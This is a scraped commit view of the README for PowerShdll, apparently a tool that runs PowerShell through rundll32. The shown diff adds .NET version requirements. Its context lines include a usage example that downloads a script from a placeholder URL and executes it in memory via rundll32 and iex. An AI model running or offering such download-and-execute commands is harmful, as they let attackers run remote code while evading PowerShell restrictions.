Projects STRLCPY PowerShdll Commits 5f68777b
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 30 lines
    31 31  ```
    32 32  rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
    33 33  ```
     34 +## Requirements
     35 +.Net v3.5 for dll mode.
     36 +.Net v2.0 for exe mode.
     37 + 
    34 38  ## Known Issues
    35 39   
    36 40  Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure.
    skipped 7 lines
Please wait...
Page is in error, reload to recover